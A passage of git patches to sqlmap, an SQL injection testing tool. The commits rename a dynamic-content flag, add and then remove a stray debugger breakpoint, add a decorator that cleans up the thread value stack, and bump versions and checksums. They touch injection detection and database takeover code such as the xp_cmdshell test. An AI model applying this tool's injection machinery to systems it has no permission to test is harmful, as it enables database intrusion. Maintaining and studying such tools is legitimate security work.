kb.matchRatio: kb.matchRatio = _ logger.debug("adjusting match ratio for current parameter to %.3f" % kb.matchRatio) # Reducing false-positive "appears" messages in heavily dynamic environment - if kb.heavyDynamic and not Request.queryPage(reqPayload, place, raise404=False): + if kb.heavilyDynamic and not Request.queryPage(reqPayload, place, raise404=False): continue injectable = True @@ -986,6 +986,11 @@ def heuristicCheckSqlInjection(place, parameter): logger.debug(debugMsg) return None + if kb.heavilyDynamic: + debugMsg = "heuristic check skipped because of heavy dynamicity" + logger.debug(debugMsg) + return None + origValue = conf.paramDict[place][parameter] paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place @@ -1048,6 +1053,8 @@ def _(page): kb.ignoreCasted = readInput(message, default='Y' if conf.multipleTargets else 'N', boolean=True) elif result: + import pdb + pdb.set_trace() infoMsg += "be injectable" if Backend.getErrorParsedDBMSes(): infoMsg += " (possible DBMS: '%s')" % Format.getErrorParsedDBMSes() @@ -1172,7 +1179,7 @@ def checkDynamicContent(firstPage, secondPage): warnMsg += "sqlmap is going to retry the request(s)" singleTimeLogMessage(warnMsg, logging.CRITICAL) - kb.heavyDynamic = True + kb.heavilyDynamic = True secondPage, _, _ = Request.queryPage(content=True) findDynamicContent(firstPage, secondPage) diff --git a/lib/core/option.py b/lib/core/option.py index 7ab02a7f675..f7f213c9815 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1945,7 +1945,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.forcePartialUnion = False kb.forceWhere = None kb.futileUnion = None - kb.heavyDynamic = False + kb.heavilyDynamic = False kb.headersFp = {} kb.heuristicDbms = None kb.heuristicExtendedDbms = None diff --git a/lib/core/settings.py b/lib/core/settings.py index a3e399806e6..9e6da36b275 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.50" +VERSION = "1.2.3.51" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index 9c6ca87267c..0e692bbbc1d 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -54,7 +54,7 @@ def _orderByTest(cols): query = agent.suffixQuery(query, suffix=suffix, comment=comment) payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where) page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) - return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and not kb.heavyDynamic and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None + return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and not kb.heavilyDynamic and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None if _orderByTest(1 if lowerCount is None else lowerCount) and not _orderByTest(randomInt() if upperCount is None else upperCount + 1): infoMsg = "'ORDER BY' technique appears to be usable. " diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 4a24291ae54..03722f61fc5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -28c80dd4b8f288f46388770415d7c1df lib/controller/checks.py +71a8af96273cde7fd8e8c8b3122df27a lib/controller/checks.py 33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py -8484e95c616b7a5220157c13e24fa1d6 lib/core/option.py +b950c8c2f2ae87ad2ec99e1d19b2c03a lib/core/option.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -30cc59cf0722d37effce632dcd38dc62 lib/core/settings.py +05c1496418a91fba529536205a7e9cc0 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -96,7 +96,7 @@ fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -07882f244fc73e130ab1a17caa6f5fb0 lib/techniques/union/test.py +36c49359a110fe0f797b2eb9e2d694ed lib/techniques/union/test.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py c552f8d924d962a26f2ded250bcea3b8 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py From 2cc6214227f233856be6b09715b43f823ea42210 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 1 Apr 2018 11:25:51 +0200 Subject: [PATCH 100/428] Fixes #3020 --- lib/controller/checks.py | 2 -- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 5 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 671d023421b..a665409954a 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1053,8 +1053,6 @@ def _(page): kb.ignoreCasted = readInput(message, default='Y' if conf.multipleTargets else 'N', boolean=True) elif result: - import pdb - pdb.set_trace() infoMsg += "be injectable" if Backend.getErrorParsedDBMSes(): infoMsg += " (possible DBMS: '%s')" % Format.getErrorParsedDBMSes() diff --git a/lib/core/settings.py b/lib/core/settings.py index 9e6da36b275..b238cf13ed1 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.51" +VERSION = "1.2.4.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 03722f61fc5..27fe9b461ac 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -71a8af96273cde7fd8e8c8b3122df27a lib/controller/checks.py +8901cbab8f3885c554fe9ac43a1e5f14 lib/controller/checks.py 33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -05c1496418a91fba529536205a7e9cc0 lib/core/settings.py +88d4f1d18b6919f1ad5f179ed959e7a7 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From 4147f44e6359ac0ecd42a4aea79a4016d5617eee Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 1 Apr 2018 12:45:47 +0200 Subject: [PATCH 101/428] Potential patch for Issues like #3013 and #3017 --- lib/controller/checks.py | 8 ++++++++ lib/controller/controller.py | 2 ++ lib/core/decorators.py | 17 +++++++++++++++++ lib/core/settings.py | 2 +- lib/request/connect.py | 2 ++ lib/request/inject.py | 2 ++ lib/takeover/xp_cmdshell.py | 2 ++ lib/techniques/union/test.py | 2 ++ lib/utils/search.py | 2 ++ plugins/dbms/mysql/filesystem.py | 2 ++ plugins/generic/databases.py | 2 ++ txt/checksum.md5 | 22 +++++++++++----------- 12 files changed, 53 insertions(+), 12 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index a665409954a..2de2bca42b5 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -54,6 +54,7 @@ from lib.core.datatype import AttribDict from lib.core.datatype import InjectionDict from lib.core.decorators import cachedmethod +from lib.core.decorators import stackedmethod from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import DBMS from lib.core.enums import HASHDB_KEYS @@ -832,6 +833,7 @@ def genCmpPayload(): return injection +@stackedmethod def heuristicCheckDbms(injection): """ This functions is called when boolean-based blind is identified with a @@ -868,6 +870,7 @@ def heuristicCheckDbms(injection): return retVal +@stackedmethod def checkFalsePositives(injection): """ Checks for false positives (only in single special cases) @@ -929,6 +932,7 @@ def _(): return retVal +@stackedmethod def checkSuhosinPatch(injection): """ Checks for existence of Suhosin-patch (and alike) protection mechanism(s) @@ -952,6 +956,7 @@ def checkSuhosinPatch(injection): kb.injection = popValue() +@stackedmethod def checkFilteredChars(injection): debugMsg = "checking for filtered characters" logger.debug(debugMsg) @@ -1314,6 +1319,7 @@ def checkRegexp(): return True +@stackedmethod def checkWaf(): """ Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse @@ -1379,6 +1385,7 @@ def checkWaf(): return retVal +@stackedmethod def identifyWaf(): if not conf.identifyWaf: return None @@ -1463,6 +1470,7 @@ def _(*args, **kwargs): return retVal +@stackedmethod def checkNullConnection(): """ Reference: http://www.wisec.it/sectou.php?id=472f952d79293 diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 9c3239d03fe..ad12620c7e7 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -43,6 +43,7 @@ from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.decorators import stackedmethod from lib.core.enums import CONTENT_TYPE from lib.core.enums import HASHDB_KEYS from lib.core.enums import HEURISTIC_TEST @@ -253,6 +254,7 @@ def _saveToResultsFile(): conf.resultsFP.flush() +@stackedmethod def start(): """ This function calls a function that performs checks on both URL diff --git a/lib/core/decorators.py b/lib/core/decorators.py index c4040f26720..94d0925c1d0 100644 --- a/lib/core/decorators.py +++ b/lib/core/decorators.py @@ -7,6 +7,8 @@ import hashlib +from lib.core.threads import getCurrentThreadData + def cachedmethod(f, cache={}): """ Method with a cached content @@ -22,3 +24,18 @@ def _(*args, **kwargs): return cache[key] return _ + +def stackedmethod(f): + def _(*args, **kwargs): + threadData = getCurrentThreadData() + originalLevel = len(threadData.valueStack) + + try: + result = f(*args, **kwargs) + finally: + if len(threadData.valueStack) > originalLevel: + threadData.valueStack = threadData.valueStack[:originalLevel] + + return result + + return _ \ No newline at end of file diff --git a/lib/core/settings.py b/lib/core/settings.py index b238cf13ed1..2ded395839b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.0" +VERSION = "1.2.4.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index dc2714bf2ce..0c130916af1 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -63,6 +63,7 @@ class WebSocketException(Exception): from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.decorators import stackedmethod from lib.core.dicts import POST_HINT_CONTENT_TYPES from lib.core.enums import ADJUST_TIME_DELAY from lib.core.enums import AUTH_TYPE @@ -768,6 +769,7 @@ class _(dict): return page, responseHeaders, code @staticmethod + @stackedmethod def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): """ This method calls a function to get the target URL page content diff --git a/lib/request/inject.py b/lib/request/inject.py index 35b0ad91057..cfe69a6ba50 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -33,6 +33,7 @@ from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries +from lib.core.decorators import stackedmethod from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS @@ -333,6 +334,7 @@ def _goUnion(expression, unpack=True, dump=False): return output +@stackedmethod def getValue(expression, blind=True, union=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True): """ Called each time sqlmap inject a SQL query on the SQL injection diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py index bb99a7dc7e7..19b06d8e80f 100644 --- a/lib/takeover/xp_cmdshell.py +++ b/lib/takeover/xp_cmdshell.py @@ -24,6 +24,7 @@ from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.decorators import stackedmethod from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS from lib.core.enums import EXPECTED @@ -96,6 +97,7 @@ def _xpCmdshellCheck(self): return wasLastResponseDelayed() + @stackedmethod def _xpCmdshellTest(self): threadData = getCurrentThreadData() pushValue(threadData.disableStdOut) diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index 0e692bbbc1d..7a63bc37f1f 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -27,6 +27,7 @@ from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.decorators import stackedmethod from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import PAYLOAD from lib.core.settings import LIMITED_ROWS_TEST_NUMBER @@ -48,6 +49,7 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where= """ retVal = None + @stackedmethod def _orderByTechnique(lowerCount, upperCount): def _orderByTest(cols): query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix) diff --git a/lib/utils/search.py b/lib/utils/search.py index 0d6e770b702..8c49b534e51 100644 --- a/lib/utils/search.py +++ b/lib/utils/search.py @@ -20,6 +20,7 @@ from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.decorators import stackedmethod from lib.core.enums import CUSTOM_LOGGING from lib.core.enums import HTTP_HEADER from lib.core.enums import REDIRECTION @@ -165,6 +166,7 @@ def _search(dork): return retVal +@stackedmethod def search(dork): pushValue(kb.redirectChoice) kb.redirectChoice = REDIRECTION.YES diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py index d28d1231283..1181d3a8664 100644 --- a/plugins/dbms/mysql/filesystem.py +++ b/plugins/dbms/mysql/filesystem.py @@ -14,6 +14,7 @@ from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.decorators import stackedmethod from lib.core.enums import CHARSET_TYPE from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD @@ -81,6 +82,7 @@ def stackedReadFile(self, rFile): return result + @stackedmethod def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False): logger.debug("encoding file to its hexadecimal string value") diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index 75a9c704c58..b17ff722a63 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -32,6 +32,7 @@ from lib.core.data import logger from lib.core.data import paths from lib.core.data import queries +from lib.core.decorators import stackedmethod from lib.core.dicts import FIREBIRD_TYPES from lib.core.dicts import INFORMIX_TYPES from lib.core.enums import CHARSET_TYPE @@ -806,6 +807,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod return kb.data.cachedColumns + @stackedmethod def getSchema(self): infoMsg = "enumerating database management system schema" logger.info(infoMsg) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 27fe9b461ac..c4011e71438 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,8 +21,8 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -8901cbab8f3885c554fe9ac43a1e5f14 lib/controller/checks.py -33689bb1b064d4eebc216934795a595f lib/controller/controller.py +84c8694d4ecacd843b6d745f032ff41f lib/controller/checks.py +c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py @@ -31,7 +31,7 @@ fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py -12e80071013606f01822c3823fb51054 lib/core/decorators.py +04638422b6ad1613238a9abf4fdf6491 lib/core/decorators.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py da98f5288aad57855c6d287ba3b397a1 lib/core/dicts.py 9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -88d4f1d18b6919f1ad5f179ed959e7a7 lib/core/settings.py +f0f522f95a11b24bec01d42a9a535e23 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -68,12 +68,12 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 7e8e0a3fdebbe443832c1bab2f8d3869 lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -a42707d6e89312659d3bdc8fb4ad1336 lib/request/connect.py +acc31fac4efc25741c061bf8d7f8c3a2 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py 1e5532ede194ac9c083891c2f02bca93 lib/request/__init__.py -cb05d965aa3d5871d14b5e45fe9128b4 lib/request/inject.py +b188a11542a996276abbbc48913501c3 lib/request/inject.py aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py 51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py aa7cb67139bbc57d67a728fd2abf80ed lib/request/rangehandler.py @@ -86,7 +86,7 @@ b1a6689e92e6ce998337bd41d8b09d6e lib/takeover/metasploit.py fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py 4584ac6ee5c13d4d395f0a7a21d8478c lib/takeover/web.py -79d1ba3ab7b2552c5f09992ce08e765d lib/takeover/xp_cmdshell.py +f1decf0a987bd3a4bc757212cbe6a6c8 lib/takeover/xp_cmdshell.py 2543e14cc7f6e239b49dd40f41bc34fa lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py @@ -96,7 +96,7 @@ fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -36c49359a110fe0f797b2eb9e2d694ed lib/techniques/union/test.py +cbe59feb11526068bbbd35dca97b3b37 lib/techniques/union/test.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py c552f8d924d962a26f2ded250bcea3b8 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py @@ -111,7 +111,7 @@ cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py 5cb78b0e60fd7fd84502d62cf85d2064 lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py -fb6cf3415fbbf117e2dc87aae2f35993 lib/utils/search.py +2e3e7213f50b52fc4d5a014a2ff8d163 lib/utils/search.py 236a8d9e596602b53f8e0aa09c30c0ef lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py 3d230e342a6c8d60ac7c68c556fbba9b lib/utils/versioncheck.py @@ -168,7 +168,7 @@ affef90b1442285da7e89e46603c502e plugins/dbms/mssqlserver/__init__.py 08fe8ac7acdfc0e3168b5b069a7c73bf plugins/dbms/mssqlserver/takeover.py f6e1f3f09f32b9cb2ca11c016d373423 plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py -f36e09edc3eafedd989fbe44ec048e71 plugins/dbms/mysql/filesystem.py +4578fa29f04d0a75499f9668466ded07 plugins/dbms/mysql/filesystem.py fcbf7ff279c527b4aca0dac94c28d20c plugins/dbms/mysql/fingerprint.py 30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py @@ -203,7 +203,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py -dc07665887191ac977e5377f5a66d288 plugins/generic/databases.py +79c6dbcb7e6ad5e993a44aa52fdc36ed plugins/generic/databases.py a9c8637f0526d751cd1a6a18f91967f5 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py 0c8abe66a78edca0660bfb8049d109e2 plugins/generic/filesystem.py From 7f3f1dcdeed9729af14fd8339be7781607c5e472 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 3 Apr 2018 12:50:09 +0200 Subject: [PATCH 102/428] Fixes #3022 --- lib/controller/checks.py | 3 ++- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 2de2bca42b5..7b2a97fa3b3 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -47,6 +47,7 @@ from lib.core.common import urlencode from lib.core.common import wasLastResponseDBMSError from lib.core.common import wasLastResponseHTTPError +from lib.core.convert import unicodeencode from lib.core.defaults import defaults from lib.core.data import conf from lib.core.data import kb @@ -1562,7 +1563,7 @@ def checkConnection(suppressOutput=False): threadData = getCurrentThreadData() if kb.redirectChoice == REDIRECTION.YES and threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID: - if conf.hostname in (threadData.lastRedirectURL[1] or "") and threadData.lastRedirectURL[1].startswith("https://"): + if (threadData.lastRedirectURL[1] or "").startswith("https://") and unicodeencode(conf.hostname) in threadData.lastRedirectURL[1]: conf.url = re.sub(r"https?://", "https://", conf.url) match = re.search(r":(\d+)", threadData.lastRedirectURL[1]) port = match.group(1) if match else 443 diff --git a/lib/core/settings.py b/lib/core/settings.py index 2ded395839b..af23c3b9fce 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.1" +VERSION = "1.2.4.2" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c4011e71438..52f65a8fe73 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -84c8694d4ecacd843b6d745f032ff41f lib/controller/checks.py +5084b16b037ed8d29f594f6113fe78e3 lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f0f522f95a11b24bec01d42a9a535e23 lib/core/settings.py +8c0c10ba91a0cac1315573757a5df233 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From 2a681b7bd68c84248d2e200c9c6ad910f6d1b919 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 5 Apr 2018 12:25:41 +0200 Subject: [PATCH 103/428] Fixes #3027 --- lib/core/readlineng.py | 4 ++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/readlineng.py b/lib/core/readlineng.py index d7e2f3a62a2..2ff8b70c8d2 100644 --- a/lib/core/readlineng.py +++ b/lib/core/readlineng.py @@ -14,11 +14,11 @@ try: from readline import * import readline as _readline -except ImportError: +except: try: from pyreadline import * import pyreadline as _readline - except ImportError: + except: pass if IS_WIN and _readline: diff --git a/lib/core/settings.py b/lib/core/settings.py index af23c3b9fce..2638150802b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.2" +VERSION = "1.2.4.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 52f65a8fe73..4989c8c656c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -42,11 +42,11 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py b950c8c2f2ae87ad2ec99e1d19b2c03a lib/core/option.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py -ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py +6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8c0c10ba91a0cac1315573757a5df233 lib/core/settings.py +18951ad78a0c84df536edef011b2c0f0 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From 641838ed73d97b1b133f65718ade5d120eb2c593 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 6 Apr 2018 01:06:58 +0200 Subject: [PATCH 104/428] Minor update --- lib/core/settings.py | 2 +- lib/request/connect.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 